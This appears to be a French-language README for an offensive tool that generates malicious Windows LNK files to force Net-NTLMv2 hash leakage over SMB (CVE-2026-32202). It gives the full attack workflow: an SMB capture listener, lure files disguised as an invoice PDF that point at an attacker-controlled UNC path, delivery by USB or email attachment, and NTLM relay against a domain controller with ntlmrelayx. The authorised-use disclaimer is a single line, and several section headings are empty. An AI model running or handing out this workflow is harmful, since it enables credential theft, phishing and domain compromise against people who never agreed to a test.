
Génère des fichiers LNK malveillants pour forcer l'obtention de hachages Net-NTLMv2 via la gestion UNC du Shell Windows, avec un écouteur SMB personnalisé et une intégration de relais pour les opérations autorisées d'équipe rouge.
Avertissement
Cet outil est destiné uniquement aux tests d'intrusion et au red teaming autorisés.
Toute utilisation non autorisée contre des systèmes sans permission explicite est illégale.
À utiliser à vos propres risques. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.
Description
Coercition de hash NTLMv2 via contournement incomplet de la protection Windows Shell (CVE-2026-32202). Génère des fichiers LNK spécialement conçus qui forcent l'authentification SMB/UNC à l'ouverture ou à l'aperçu dans l'Explorateur. Faible interaction, fonctionne sur les systèmes patchés où le correctif d'avril 2026 s'est avéré insuffisant. Activement utilisé lors d'engagements.
Fonctionnalités clés
Ce que fait l'exploit
L'outil crée un .LNK conçu qui abuse de la gestion par Shell des chemins UNC dans Target + IconEnvironmentDataBlock / structures ExtraData. Lorsque la victime parcourt le dossier ou survole/aperçoit le fichier, Windows Shell initie une connexion SMB vers l'UNC contrôlé par l'attaquant, divulguant le hash Net-NTLMv2 de la machine/utilisateur. Pas d'exécution de code sur la cible - coercition d'identifiants pour relay ou cracking.
Pourquoi c'est utile
Testé sur
Dépendances
Installation : pip install -r requirements.txt
Utilisation
# 1. Démarrer le serveur de capture (hôte attaquant)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Générer le LNK malveillant
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Optionnel : mode stable ou contournement
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. Livrer le LNK (USB, partage, pièce jointe email, OneDrive, etc.)
# 4. Attendre le hash dans le terminal + fichier. Exemple de relay :
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# ou relay LDAP pour RBCD, HTTP pour certificat ADCS, etc.
Exploit
Limitations
Cause racine (résumé)
Correctif incomplet dans l'assainissement des chemins UNC de Windows Shell et le traitement des blocs ExtraData pour la résolution d'icônes/cibles LNK. Le mécanisme de protection destiné à bloquer le spoofing réseau non authentifié déclenche toujours l'authentification NTLM lors de l'énumération de l'espace de noms Shell.